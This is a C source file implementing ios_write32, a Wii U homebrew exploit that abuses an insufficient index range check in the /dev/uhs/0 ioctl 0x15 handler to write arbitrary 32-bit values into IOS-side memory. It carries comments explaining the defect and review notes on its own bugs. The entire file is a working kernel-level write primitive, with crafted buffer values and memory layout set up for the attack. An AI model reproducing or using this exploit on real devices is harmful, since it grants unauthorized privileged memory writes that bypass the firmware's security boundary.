/*
 * Exploits range check in /dev/uhs/0 Ioctl command 0x15
 *
 * Uses IOS commands from https://github.com/darksideos/darkside-kernel/blob/wiiu/bal/src/platform/wiiu/ios.c
 * ported for usage with HBL.
 */
/*
 * ios_write32 - store one 32-bit word at an IOS-side address by driving the
 * /dev/uhs/0 ioctl 0x15 handler with a crafted input buffer. The handler
 * defect relied on is the insufficient range check named in the header
 * comment above: the index supplied in buffer[0] is folded into a pointer
 * (see the buf_0_m note below) without a bound that excludes it. Validating
 * that index on the handler side is what closes this primitive.
 *
 * @fd:      an already-open /dev/uhs/0 descriptor, or 0 to have the
 *           function open its own and close it again before returning.
 *           0 doubles as the "not open" sentinel, so a caller that really
 *           holds descriptor 0 gets an extra open/close.
 * @address: IOS-side address to write; what is stored in the scratch area
 *           is address - 0x18, matching the +0x18 the handler applies
 *           (per the comment on the TEMP[520] line).
 * @value:   word to store at @address.
 *
 * Returns the IOS_Ioctl result unchanged; the caller interprets it.
 *
 * Review notes (defects left as-is in this listing):
 *  - IOS_Open's result is assigned to fd with no error check.
 *  - OSAllocFromSystem's result is written through without a NULL check.
 *  - `ctr` is never read after the "small wait" loop, so the loop has no
 *    observable effect and an optimizing compiler may remove it; the delay
 *    is not guaranteed.
 *  - MEM1 and TEMP are fixed virtual addresses; the values placed in MEM1
 *    are offsets relative to MEMBASE, so all three constants must agree.
 */
uint32_t ios_write32(int fd, uint32_t address, uint32_t value)
{
    int opened = 0;
    if (fd == 0)
    {
        // Open our own descriptor; remember to close it on the way out.
        fd = IOS_Open("/dev/uhs/0", 10, 0);
        opened = 1;
    }
    // 0x70-byte ioctl input block, zeroed before the two used words are set.
    // NOTE(review): return value is not checked for NULL before the loop.
    uint32_t * buffer = (uint32_t *)OSAllocFromSystem(0x70, 0x10);
    for (int i = 0; i < 0x70/4; i++) buffer[i] = 0;
    // buf_0_m = (0x10146080 + 0x144 * buffer[0] + 0x39EC)
    // buffer[0] == 0xEDC7D670 => buf_0_m = 0x100002C
    // Corresponds to virtual address 0xF500002C.
    buffer[0] = 0xEDC7D670;
    buffer[1] = value;
    // Setup MEM1 for hax
    // Both MEM1 and TEMP are stored into MEM1 as MEMBASE-relative offsets below.
    uint32_t MEMBASE = 0xF4000000;
    uint32_t * MEM1 = (uint32_t *)0xF500002C;
    uint32_t * TEMP = (uint32_t *)0xF5300000;
    MEM1[0x4E] = 0; // if ( buf_0_m[0x4E] )
    MEM1[0x21] = ((uint32_t)MEM1) - MEMBASE; // v11 = (_DWORD *)buf_0_m[0x21];
    MEM1[0x8] = ((uint32_t)TEMP) - MEMBASE; // v12 = v11[8]
    TEMP[5] = 1; // if ( v12[5] )
    TEMP[520] = address - 0x18; // *(_DWORD *)(v12[520] + 0x18) = buf_1;
    TEMP[33] = 0; // Guaranteed immediate return if !(*(_DWORD *)((v12+108) + 24)), or v12[33].
    // Presumably pushes the writes above out of the data cache before the
    // ioctl is issued — the exact semantics of DCFlushRange are not shown here.
    DCFlushRange(MEM1, 0x1000);
    DCFlushRange(TEMP, 0x1000);
    DCFlushRange(buffer, 0x70);
    int ret = IOS_Ioctl(fd, 0x15, buffer, 0x70, NULL, 0);
    if (opened)
    {
        IOS_Close(fd);
    }
    // Small wait.
    // NOTE(review): ctr is never read, so this loop may be optimized away.
    int ctr = 0;
    for (int i = 0; i < 0x00500000; i++) ctr++;
    OSFreeToSystem(buffer);
    return ret;
}